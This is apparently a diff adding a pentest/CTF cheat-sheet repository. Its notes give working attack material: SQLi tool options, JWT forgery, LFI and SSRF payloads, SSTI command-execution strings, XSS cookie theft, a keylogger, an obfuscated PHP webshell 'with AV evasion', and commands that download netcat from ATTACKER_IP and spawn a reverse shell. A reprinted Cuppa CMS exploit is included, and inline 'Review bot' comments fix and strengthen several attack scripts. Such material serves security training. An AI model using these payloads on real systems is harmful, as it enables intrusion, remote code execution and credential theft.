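+|--dbms|DBMS of target|
+|--dump|Dump the entire database|
+|--dump-all|Dump everything|
+|-p |TESTPARAMETER|
+|--os-shell|Prompt for an interactive operating system shell|
+|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|
+
+### Damn Small SQLi Scanner (DSSS)
+* [Script](https://github.com/stamparm/DSSS.git)
+```sh
+python dsss.py -u "http://example.com/index.php?id="
+```
+
+### Online sqlmap
+* [Link](https://suip.biz/?act=sqlmap)
+
+## Payloads
+* [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads)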
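--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1,4 @@
+# Sudo pwnge with pwfeedback()
+
+* Sudo version 1.7.1 to 1.8.30
+* [Saleem's github](https://github.com/saleemrashid/sudo-cve-2019-18634)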
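--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1 @@
+Subproject commit 15af383355e87428a54251664feca7004a21e291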
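--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1 @@
+# CSRF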
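--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1,23 @@
+# Forced Browsing
+Forced browsing is the art of using logic to find resources on the website that you would not normally be able to access. For example let's say we have a note taking site, that is structured like this. http://example.com/user1/note.txt. It stands to reason that if we did http://example.com/user2/note.txt we may be able to access user2's note.
+
+## Usage
+
+## Tools
+
+### wfuzz
+* `pip install wfuzz`
+
+```
+wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/big.txt --hw 57 http://10.10.28.2/FUZZ/note.txt
+```
+
+|Parameter|Detail|
+|---------|------|
+|-c|Shows the output in color|
+|-z|Specifies what will replace FUZZ in the request. For example -z file,big.txt will read through all the lines of big.txt and replace FUZZ with|
+|--hc|Don't show certain http response codes|
+|--hl|Don't show a certain amount of lines in the response|
+|--hh|Don't show a certain amount of words|
+|--hw|Don't show word response return val of this length|
+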
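--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1,3 @@
+# Insecure Direct Object Reference (IDOR)
+
+Changing URL parameters.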
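--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1 @@
+Subproject commit 8822dd26550174eaa80f3cc7b0b023d0aad52c61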
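--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1,88 @@
+# JSON Web Token
+
+## Build up
+```sh
+header.payload.signature
+```
+
+1. **Header**: This consists of the algorithm used and the type of the token.
+```sh
+{ "alg": "HS256", "typ": "JWT"}
+```
+
+2. **Payload**: This is part that contains the access given to the certain user etc. This can vary from website to website, some can just have a simple username and some ID and others could have a lot of other details.
+
+
+3. **Signature**: This is the part that is used to make sure that the integrity of the data was maintained while transferring it from a user's computer to the server and back. This is encrypted with whatever algorithm or alg that was passed in the header's value. And this can only be decrypted with a predefined secret(which should be difficult to)
+
+
+## NONE Algorithm Vulnerability
+* Example with `alg: NONE`, so no third part is needed.
+```sh
+eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K.
+```
+* Encoded headers are as follows
+* `{"type": "JWT", "alg": "none"}`
+```
+eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0
+```
+* `{"typ":"JWT","alg":"NONE"}` with trailing `\n`
+```
+eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K
+```
+
+## Brute Force
+```python
+HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)
+```
+* [jwt-cracker](https://github.com/lmammino/jwt-cracker.git)
+
+|Parameter|Details|
+|---------|-------|
+|Token | The HS256 JWT Token|
+|Alphabet |Alphabet used to crack (default:"abcdefghijklmnopqrstuvwxyz")|
+|max-length|Secret max length (default: 12)|
+
+```sh
+[whackx@manbox jwt-cracker]$ node index.js eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.it4Lj1WEPkrhRo9a2-XHMGtYburgHbdS5s7Iuc1YKOE abcdefghijklmnopqrstuvwxyz 4
+Attempts: 100000
+Attempts: 200000
+Attempts: 300000
+SECRET FOUND: pass
+Time taken (sec): 11.605
+Attempts: 346830
+```
+## HS256 Vulnerability
+It is calculated by using server `K_pub`, which may be gained via content of the server cert
+
+### Build Up
+* Changing the header to `{"typ": "JWT", "alg": "HS256"}`, spaces inbetween values.
+```sh
+$ echo -n '{"typ": "JWT", "alg": "HS256"}' | base64
+eyJ0eXAiOiAiSldUIiwgImFsZyI6ICJIUzI1NiJ9
+```
+
+* Encoding the payload, no spaces inbetween. Cut `==` at the end.
+```sh
+echo -n '{"iss":"http://localhost","iat":1585323784,"exp":1585323904,"data":{"hello":"world"}}' | base64
+eyJpc3MiOiJodHRwOi8vbG9jYWxob3N0IiwiaWF0IjoxNTg1MzIzNzg0LCJleHAiOjE1ODUzMjM5MDQsImRhdGEiOnsiaGVsbG8iOiJ3b3JsZCJ9fQ==
+```
+
+* Crafting the HMAC signature
+* Convert `K_pub` file to hex
+```sh
+cat id_rsa.pub | xxd -p | tr -d "\\n"
+```
+* Sign the message to get the signature as hex value
+```sh
+echo -n "eyJ0eXAiOiAiSldUIiwgImFsZyI6ICJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vbG9jYWxob3N0IiwiaWF0IjoxNTg1MzIzNzg0LCJleHAiOjE1ODUzMjM5MDQsImRhdGEiOnsiaGVsbG8iOiJ3b3JsZCJ9fQ" | openssl dgst -sha256 -mac HMAC -macopt hexkey <converted_public_hex>
+```
+* Decode hex to binary data and reencode as base64 via python
+```python
+python -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('<signature_as_hexval>')).replace('=','')\")"
+```
+
+## Tools
+* [JWTtool](https://github.com/ticarpi/jwt_tool.git)
+* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/JSON%20Web%20Token)
+* https://jwt.io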
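--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1 @@
+Subproject commit c765a2e0d0c25b883dcb92a6966c69b9880098da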
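--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1 @@
+{"typ": "JWT", "alg": "HS256"}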
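--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1,19 @@
+# Local File Inclusion
+To test for LFI what we need is a parameter on any URL or any other input fields like request body etc. For example, if the website is tryhackme.com then a parameter in the URL can look like `https://tryhackme.com/?file=robots.txt`. Here file is the name of the parameter and `robots.txt` is the value that we are passing (include the file robots.txt).
+
+## Usage
+
+* Exploit URL parameter
+```
+http://example.com/home?page=about.html
+```
+* changed to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks)
+```
+http://example.com/home?page=../../../../etc/passwd
+```
+or
+```
+http://example.com/home?page=../../../../home/<username>/.ssh/id_rsa
+```
+
+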
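--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1,17 @@
+We'll look at this as a step-by-step process. Let's say that we've been given a website to perform a security audit on.
+
+1. The first thing we would do is take a look at the website as a whole. Using browser extensions such as the aforementioned Wappalyzer (or by hand) we would look for indicators of what languages and frameworks the web application might have been built with. Be aware that Wappalyzer is not always 100% accurate. A good start to enumerating this manually would be by making a request to the website and intercepting the response with Burpsuite. Headers such as server or x-powered-by can be used to gain information about the server. We would also be looking for vectors of attack, like, for example, an upload page.
+2. Having found an upload page, we would then aim to inspect it further. Looking at the source code for client-side scripts to determine if there are any client-side filters to bypass would be a good thing to start with, as this is completely in our control.
+3. We would then attempt a completely innocent file upload. From here we would look to see how our file is accessed. In other words, can we access it directly in an uploads folder? Is it embedded in a page somewhere? What's the naming scheme of the website? This is where tools such as Gobuster might come in if the location is not immediately obvious. This step is extremely important as it not only improves our knowledge of the virtual landscape we're attacking, it also gives us a baseline "accepted" file which we can base further testing on.
+* An important Gobuster switch here is the -x switch, which can be used to look for files with specific extensions. For example, if you added -x php,txt,html to your Gobuster command, the tool would append .php, .txt, and .html to each word in the selected wordlist, one at a time. This can be very useful if you've managed to upload a payload and the server is changing the name of uploaded files.
+4. Having ascertained how and where our uploaded files can be accessed, we would then attempt a malicious file upload, bypassing any client-side filters we found in step two. We would expect our upload to be stopped by a server side filter, but the error message that it gives us can be extremely useful in determining our next steps.
+
+
+Assuming that our malicious file upload has been stopped by the server, here are some ways to ascertain what kind of server-side filter may be in place:
+
+* If you can successfully upload a file with a totally invalid file extension (e.g. testingimage.invalidfileextension) then the chances are that the server is using an extension blacklist to filter out executable files. If this upload fails then any extension filter will be operating on a whitelist.
+* Try re-uploading your originally accepted innocent file, but this time change the magic number of the file to be something that you would expect to be filtered. If the upload fails then you know that the server is using a magic number based filter.
+* As with the previous point, try to upload your innocent file, but intercept the request with Burpsuite and change the MIME type of the upload to something that you would expect to be filtered. If the upload fails then you know that the server is filtering based on MIME types.
+* Enumerating file length filters is a case of uploading a small file, then uploading progressively bigger files until you hit the filter. At that point you'll know what the acceptable limit is. If you're very lucky then the error message of original upload may outright tell you what the size limit is. Be aware that a small file length limit may prevent you from uploading the reverse shell we've been using so far.
+
+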
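--- /dev/null
+++ b/[path-not-shown-on-page]
@@ -0,0 +1,35 @@
+# PHP Payload in Image ExifData
+
+* Test
+```sh
+exiftool -Comment="<?php echo \"<pre>Test Payload</pre>\"; die(); ?>" test-USERNAME.jpeg.php
+```
+
+* Build Payload with AV evasion
+```sh
+<?php
+$cmd = $_GET["wreath"];
+if (isset($cmd)){
+echo "<pre>" . shell_exec($cmd) . "</pre>";
+}
+die();
+?>
+```
+
+* [php obfuscater](https://www.gaijin.at/en/tools/php-obfuscator)
+
+* Obfuscated code with escaped `$`
+```sh
+<?php \$p0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$p0)){echo base64_decode('PHByZT4=').shell_exec(\$p0).base64_decode('PC9wcmU+');}die();?>
+```
+* Upload and execute commands with get parameter `?wreath=systeminfo`
+
+## Uploading Reverse through Webshell
+* Parameter for Webshell
+```sh
+curl http://ATTACKER_IP/nc.exe -o c:\\windows\\temp\\nc-USERNAME.exe
+```
+* Trigger uploaded netcat
+```sh
+powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe
+```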
@ -0,0 +1,9 @@
|
||||||
|
# Re-registration
|
||||||
|
|
||||||
|
Let's understand this with the help of an example, say there is an existing user with the name admin and now we want to get access to their account so what we can do is try to re-register that username but with slight modification. We are going to enter " admin"(notice the space in the starting). Now when you enter that in the username field and enter other required information like email id or password and submit that data. It will actually register a new user but that user will have the same right as normal admin. And that new user will also be able to see all the content present under the user admin.
|
||||||
|
|
||||||
|
# Usage
|
||||||
|
* Re-register. The name is taken, that's the point, but alter the string
|
||||||
|
```
|
||||||
|
try to register a user name darren, you'll see that user already exists so then try to register a user " darren" and you'll see that you are now logged in and will be able to see the content present only in Darren's account which in our case is the flag that you need to retrieve.
|
||||||
|
```
|
|
@ -0,0 +1,87 @@
|
||||||
|
# Exploit Title : Cuppa CMS File Inclusion
|
||||||
|
# Date : 4 June 2013
|
||||||
|
# Exploit Author : CWH Underground
|
||||||
|
# Site : www.2600.in.th
|
||||||
|
# Vendor Homepage : http://www.cuppacms.com/
|
||||||
|
# Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
|
||||||
|
# Version : Beta
|
||||||
|
# Tested on : Window and Linux
|
||||||
|
|
||||||
|
,--^----------,--------,-----,-------^--,
|
||||||
|
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
|
||||||
|
`+---------------------------^----------|
|
||||||
|
`\_,-------, _________________________|
|
||||||
|
/ XXXXXX /`| /
|
||||||
|
/ XXXXXX / `\ /
|
||||||
|
/ XXXXXX /\______(
|
||||||
|
/ XXXXXX /
|
||||||
|
/ XXXXXX /
|
||||||
|
(________(
|
||||||
|
`------'
|
||||||
|
|
||||||
|
####################################
|
||||||
|
VULNERABILITY: PHP CODE INJECTION
|
||||||
|
####################################
|
||||||
|
|
||||||
|
/alerts/alertConfigField.php (LINE: 22)
|
||||||
|
|
||||||
|
-----------------------------------------------------------------------------
|
||||||
|
LINE 22:
|
||||||
|
<?php include($_REQUEST["urlConfig"]); ?>
|
||||||
|
-----------------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
#####################################################
|
||||||
|
DESCRIPTION
|
||||||
|
#####################################################
|
||||||
|
|
||||||
|
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
|
||||||
|
|
||||||
|
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
|
||||||
|
|
||||||
|
#####################################################
|
||||||
|
EXPLOIT
|
||||||
|
#####################################################
|
||||||
|
|
||||||
|
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
|
||||||
|
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
|
||||||
|
|
||||||
|
Moreover, We could access Configuration.php source code via PHPStream
|
||||||
|
|
||||||
|
For Example:
|
||||||
|
-----------------------------------------------------------------------------
|
||||||
|
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
|
||||||
|
-----------------------------------------------------------------------------
|
||||||
|
|
||||||
|
Base64 Encode Output:
|
||||||
|
-----------------------------------------------------------------------------
|
||||||
|
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
|
||||||
|
-----------------------------------------------------------------------------
|
||||||
|
|
||||||
|
Base64 Decode Output:
|
||||||
|
-----------------------------------------------------------------------------
|
||||||
|
<?php
|
||||||
|
class Configuration{
|
||||||
|
public $host = "localhost";
|
||||||
|
public $db = "cuppa";
|
||||||
|
public $user = "root";
|
||||||
|
public $password = "Db@dmin";
|
||||||
|
public $table_prefix = "cu_";
|
||||||
|
public $administrator_template = "default";
|
||||||
|
public $list_limit = 25;
|
||||||
|
public $token = "OBqIPqlFWf3X";
|
||||||
|
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
|
||||||
|
public $upload_default_path = "media/uploadsFiles";
|
||||||
|
public $maximum_file_size = "5242880";
|
||||||
|
public $secure_login = 0;
|
||||||
|
public $secure_login_value = "";
|
||||||
|
public $secure_login_redirect = "";
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
-----------------------------------------------------------------------------
|
||||||
|
|
||||||
|
Able to read sensitive information via File Inclusion (PHP Stream)
|
||||||
|
|
||||||
|
################################################################################################################
|
||||||
|
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
|
||||||
|
################################################################################################################
|
|
@ -0,0 +1,17 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
import requests
|
||||||
|
|
||||||
|
s = requests.Session()
|
||||||
|
|
||||||
|
t = []
|
||||||
|
j = 0
|
||||||
|
for i in range(1, 65536):
|
||||||
|
r = s.get(f"http://10.10.214.67:8000/attack?url=http%3A%2F%2F0xa0a0a05%3A{i}")
|
||||||
|
print(r.text)
|
||||||
|
if "Target is not reachable!" in r.text:
|
||||||
|
print(f"{i} is reachable, sum is {j}")
|
||||||
|
t.append(f"Port {i}, {r.text}")
|
||||||
|
else:
|
||||||
|
print (f"{i} not reachable")
|
||||||
|
print(t)
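Review bot: The reachability test at `if "Target is not reachable!" in r.text:` is inverted — it records a port as reachable exactly when the server reports it is not, so `t` ends up holding every closed port and the open ones are printed as `not reachable` (unless the application's message is itself backwards, which nothing here suggests). Flip it to `if "Target is not reachable!" not in r.text:`. The counter `j` is never incremented, so `sum is {j}` always prints 0; either drop it or `j += 1` when a port is recorded. Printing `r.text` for all 65535 responses buries the result, and `s.get` has no `timeout=`, so a single filtered port that drops packets stalls the whole scan; print only on a hit and pass `timeout=3`.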
|
|
@ -0,0 +1,8 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
for x in {1..65535};
|
||||||
|
do cmd=$(curl -so /dev/null http://10.10.214.67:8000/attack?url=http://2130706433:${x} \
|
||||||
|
-w '%{size_download}');
|
||||||
|
if [ $cmd != 1045 ]; then
|
||||||
|
echo "Open port: $x"
|
||||||
|
fi
|
||||||
|
done
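Review bot: `curl` runs without a timeout, so one filtered port that silently drops packets hangs the 65535-iteration loop; add `--max-time 3` to the curl call. `[ $cmd != 1045 ]` leaves `$cmd` unquoted — when curl fails and prints nothing the test degenerates to `[ != 1045 ]` and errors out — so write `[[ "$cmd" != 1045 ]]`, and quote the URL since `?` is a glob character. The magic `1045` is the body size of the not-reachable page for this one target; measuring it once at the top from a known-closed port (`base=$(curl -so /dev/null --max-time 3 "http://10.10.214.67:8000/attack?url=http://2130706433:1" -w '%{size_download}')`) and comparing against `$base` keeps the script from misreporting when the page changes.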
|
|
@ -0,0 +1,31 @@
|
||||||
|
"""
|
||||||
|
u can run this in the following format:
|
||||||
|
For decimal: python3 ip2dh.py D <Ip-address>
|
||||||
|
For Hexadecimal: python3 ip2dh.py H <Ip-address>
|
||||||
|
"""
|
||||||
|
#!/usr/bin/python3
|
||||||
|
|
||||||
|
import sys
|
||||||
|
|
||||||
|
if len(sys.argv) < 3:
|
||||||
|
print('\nYou must give desired format and IPv4 address as input...')
|
||||||
|
print('e.g.: D 192.168.10.100')
|
||||||
|
print('Valid formats D=Decimal H=Hexadecimal\n')
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
Format = sys.argv[1]
|
||||||
|
|
||||||
|
def long(ip):
|
||||||
|
IP = ip.split('.')
|
||||||
|
IP = list(map(int, IP))
|
||||||
|
LongIP = IP[0]*2**24 + IP[1]*2**16 + IP[2]*2**8 + IP[3]
|
||||||
|
return LongIP
|
||||||
|
|
||||||
|
ip = long(sys.argv[2])
|
||||||
|
|
||||||
|
if Format == 'D':
|
||||||
|
print('\nIP as Decimal format: %s' % (ip))
|
||||||
|
|
||||||
|
if Format == 'H':
|
||||||
|
print('\nIP as Hexadecimal format: %s' % (hex(ip)))
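Review bot: The `#!/usr/bin/python3` line comes after the module docstring, so it is not a shebang and the file cannot be run directly; move it to line 1. `long()` silently accepts octets above 255 and any number of dotted parts (`10.10.10` raises a bare IndexError at `IP[3]`), and it shadows the Python 2 builtin name; replacing it with the standard library — `import ipaddress` and `ip = int(ipaddress.IPv4Address(sys.argv[2]))` — validates the address and yields the same decimal and `hex()` values. A format letter other than `D` or `H` currently exits with no output at all; a trailing `else:` that prints the usage would make that visible.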
|
||||||
|
|
|
@ -0,0 +1,26 @@
|
||||||
|
# Server Side Request Forgery (SSRF)
|
||||||
|
is a vulnerability in web applications whereby an attacker can make further HTTP requests through the server. An attacker can make use of this vulnerability to communicate with any internal services on the server's network which are generally protected by firewalls.
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
|
||||||
|
### Sanity Test Service
|
||||||
|
Test if input is sanitized by exploiting function. Here it is IP:PORT finding service. Test for localhost ports.
|
||||||
|
```
|
||||||
|
http://127.0.0.1:3306
|
||||||
|
http://localhost:5432
|
||||||
|
http://0.0.0.0:53
|
||||||
|
```
|
||||||
|
* IPv6
|
||||||
|
```
|
||||||
|
http://[::]:3306
|
||||||
|
http://:::3006
|
||||||
|
```
|
||||||
|
* [Changing input format into hex or encoded](https://gist.github.com/mzfr/fd9959bea8e7965d851871d09374bb72)
|
||||||
|
|
||||||
|
### Reading files
|
||||||
|
```
|
||||||
|
file:///etc/passwd
|
||||||
|
```
|
||||||
|
|
||||||
|
### Tools
|
||||||
|
* [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#file)
|
|
@ -0,0 +1,59 @@
|
||||||
|
# Server Side Template Injection (SSTI)
|
||||||
|
Pass in parameters to control the template.
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
* Sanity test
|
||||||
|
```python
|
||||||
|
{{2+2}}
|
||||||
|
```
|
||||||
|
|
||||||
|
* Flask template LFI
|
||||||
|
```python
|
||||||
|
{{ ''.__class__.__mro__[2].__subclasses__()[40]()(<file>).read()}}
|
||||||
|
```
|
||||||
|
|
||||||
|
* Executing commands
|
||||||
|
```sh
|
||||||
|
{{ ''.__class__.__mro__[1].__subclasses__()[401]("whoami", shell=True, stdout=-1).communicate() }}
|
||||||
|
```
|
||||||
|
|
||||||
|
* RCE on server
|
||||||
|
```python
|
||||||
|
{{config.__class__.__init__.__globals__['os'].popen(<command>).read()}}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Identification of Template Engine
|
||||||
|
Identify via payload checking
|
||||||
|
* Smarty: `a{*comment*}b`
|
||||||
|
* Mako: `${"z".join("ab")}`
|
||||||
|
* Twig or Jinja2
|
||||||
|
```sh
|
||||||
|
{{7*7}}
|
||||||
|
{{7*'7'}}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
### TPlmap
|
||||||
|
```sh
|
||||||
|
git clone https://github.com/epinna/tplmap.git
|
||||||
|
pip2 install -r requirements
|
||||||
|
```
|
||||||
|
|
||||||
|
|HTTP Method|Parameter|
|
||||||
|
|-----------|---------|
|
||||||
|
|GET|`tplmap -u <url>/?<vulnparam>`|
|
||||||
|
|POST|`tplmap -u <url> -d '<vulnparam>'`|
|
||||||
|
|
||||||
|
* Using remote command
|
||||||
|
```
|
||||||
|
tplmap -u http://<ip>:<port>/ -d '<vulnparam>' --os-cmd "cat /etc/passwd"
|
||||||
|
```
|
||||||
|
|
||||||
|
### Countermeasure
|
||||||
|
* Remove everything in user input but alnum. Passing data, not data to f-string.
|
||||||
|
```python
|
||||||
|
input = re.sub("[^A-Za-z0-9]", "", input)
|
||||||
|
template = "User input is {{ input }}"
|
||||||
|
return render_template_string(template, input=input)
|
||||||
|
```
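Review bot: `pip2 install -r requirements` under `### TPlmap` will fail; the file in that repository is `requirements.txt`. The Flask LFI payload `''.__class__.__mro__[2]` only works on Python 2, where the MRO is `(str, basestring, object)`; on Python 3 it is `(str, object)` and `[2]` raises IndexError, so use `__mro__[1]` as the command-execution payload below already does. The `[40]` and `[401]` subclass indexes are specific to one interpreter build; enumerate `''.__class__.__mro__[1].__subclasses__()` on the target first, or prefer the `config.__class__.__init__.__globals__['os']` payload, which does not depend on indexes. `{{7*'7'}}` is listed without its discriminator: Jinja2 renders `7777777` (string repetition) while Twig renders `49`. In the countermeasure the sentence `Passing data, not data to f-string` should say that the protection is passing `input` as a template variable rather than interpolating it into the template string — the `re.sub` whitelist is defence in depth, not what prevents the injection.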
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 1d6315650b2177d25e5f8513b35dd80006996d98
|
|
@ -0,0 +1,3 @@
|
||||||
|
# URL Forgery
|
||||||
|
|
||||||
|
* Just change parts of the URL
|
|
@ -0,0 +1,106 @@
|
||||||
|
# Cross-Site Scripting
|
||||||
|
A web application is vulnerable to XSS if it uses unsanitized user input. XSS is possible in Javascript, VBScript, Flash and CSS.
|
||||||
|
|
||||||
|
## Stored XSS
|
||||||
|
This is where a malicious string originates from the websites database.
|
||||||
|
|
||||||
|
### Examples
|
||||||
|
* Sanity test by changing DOM content
|
||||||
|
```
|
||||||
|
<script>document.getElementById('myIdName').innerHTML="napf"</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
* Cookie stealing
|
||||||
|
|
||||||
|
```
|
||||||
|
<script>document.location='/log/'+document.cookie</script>
|
||||||
|
```
|
||||||
|
* Navigte to `/logs` and take sid
|
||||||
|
|
||||||
|
## Reflected XSS
|
||||||
|
In a reflected cross-site scripting attack, the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.
|
||||||
|
|
||||||
|
### Usage
|
||||||
|
As script inside parameter
|
||||||
|
```sh
|
||||||
|
http://example.com/search?keyword=<script>...</script>
|
||||||
|
```
|
||||||
|
* Show server IP
|
||||||
|
```
|
||||||
|
http://example.com/reflected?keyword=<script>alert(window.location.hostname)</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
## DOM based XSS
|
||||||
|
With DOM-Based xss, an attackers payload will only be executed when the vulnerable Javascript code is either loaded or interacted with. It goes through a Javascript function like so:
|
||||||
|
```javascript
|
||||||
|
var keyword = document.querySelector('#search')
|
||||||
|
keyword.innerHTML = <script>...</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Usage
|
||||||
|
* Find the sub-object inside the document
|
||||||
|
```javascript
|
||||||
|
test" onmouseover="alert('YO!')"
|
||||||
|
```
|
||||||
|
* Show cookie
|
||||||
|
```
|
||||||
|
test" onmouseover="alert(document.cookie)"
|
||||||
|
```
|
||||||
|
## Bypass Filters
|
||||||
|
* `<script>` sanitizing
|
||||||
|
```HTML
|
||||||
|
<img src=x onerror=alert('Hello');>
|
||||||
|
```
|
||||||
|
or
|
||||||
|
```javascript
|
||||||
|
<</script>script>alert("1")<</script>/script>
|
||||||
|
```
|
||||||
|
* `alert()` sanitizing
|
||||||
|
```javascript
|
||||||
|
0\"autofocus/onfocus=alert(1)--><onerror=prompt(2)>"-confirm(3)-"
|
||||||
|
```
|
||||||
|
or
|
||||||
|
```javascript
|
||||||
|
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
|
||||||
|
```
|
||||||
|
* Strings, here its `Hello`
|
||||||
|
```javascript
|
||||||
|
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert('Hello')"></xss>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Portscanner via Javascript
|
||||||
|
* By requesting the favicon, checking port 80
|
||||||
|
```javascript
|
||||||
|
<script>
|
||||||
|
for (let i = 0; i < 256; i++) {
|
||||||
|
let ip = '192.168.0.' + i
|
||||||
|
|
||||||
|
let code = '<img src="http://' + ip + '/favicon.ico" onload="this.onerror=null; this.src=/log/' + ip + '">'
|
||||||
|
document.body.innerHTML += code
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
* [pdp's portscanner](https://www.gnucitizen.org/files/2006/08/jsportscanner.js)
|
||||||
|
|
||||||
|
|
||||||
|
## Keylogger
|
||||||
|
```javascript
|
||||||
|
<script type="text/javascript">
|
||||||
|
let l = ""; // Variable to store key-strokes in
|
||||||
|
document.onkeypress = function (e) { // Event to listen for key presses
|
||||||
|
l += e.key; // If user types, log it to the l variable
|
||||||
|
console.log(l); // update this line to post to your own server
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Protection Methods
|
||||||
|
|
||||||
|
There are many ways to prevent XSS, here are the 3 ways to keep cross-site scripting our of your application.
|
||||||
|
|
||||||
|
1. Escaping - Escape all user input. This means any data your application has received is secure before rendering it for your end users. By escaping user input, key characters in the data received but the web page will be prevented from being interpreter in any malicious way. For example, you could disallow the < and > characters from being rendered.
|
||||||
|
|
||||||
|
2. Validating Input - This is the process of ensuring your application is rendering the correct data and preventing malicious data from doing harm to your site, database and users. Input validation is disallowing certain characters from being submit in the first place.
|
||||||
|
|
||||||
|
3. Sanitising - Lastly, sanitizing data is a strong defence but should not be used to battle XSS attacks alone. Sanitizing user input is especially helpful on sites that allow HTML markup, changing the unacceptable user input into an acceptable format. For example you could sanitise the < character into the HTML entity <
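Review bot: The favicon scanner under `## Portscanner via Javascript` is not valid JavaScript: inside the single-quoted string the attribute becomes `this.src=/log/192.168.0.1`, where `/log/` is parsed as a regular-expression literal rather than a path, so the callback image is never requested. Quote the path, `this.src=\'/log/' + ip + '\'` (or build the element with `document.createElement('img')` and assign `src` as a property), and keep `this.onerror=null` so a failing callback does not loop. The keylogger's `document.onkeypress` is deprecated and does not fire for Backspace, Enter on some browsers, or arrow keys; `document.addEventListener('keydown', ...)` captures them. In `## Protection Methods` item 3 the entity has been rendered away: `sanitise the < character into the HTML entity <` should read `... into the HTML entity &lt;`.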
|
|
@ -0,0 +1,78 @@
|
||||||
|
# XML External Entity (XXE)
|
||||||
|
|
||||||
|
An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers/data. It often allows an attacker to interact with any backend or external systems that the application itself can access and can allow the attacker to read the file on that system. They can also cause Denial of Service (DoS) attack or could use XXE to perform Server-Side Request Forgery (SSRF) inducing the web application to make requests to other applications. XXE may even enable port scanning and lead to remote code execution.
|
||||||
|
|
||||||
|
There are two types of XXE attacks: in-band and out-of-band (OOB-XXE).
|
||||||
|
1. An in-band XXE attack is the one in which the attacker can receive an immediate response to the XXE payload.
|
||||||
|
|
||||||
|
2. out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server.
|
||||||
|
|
||||||
|
## Document Type Definition (DTD)
|
||||||
|
A DTD defines the structure and the legal elements and attributes of an XML document.
|
||||||
|
|
||||||
|
* Example file content of `note.dtd`
|
||||||
|
```
|
||||||
|
<!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]>
|
||||||
|
```
|
||||||
|
* !DOCTYPE note - Defines a root element of the document named note
|
||||||
|
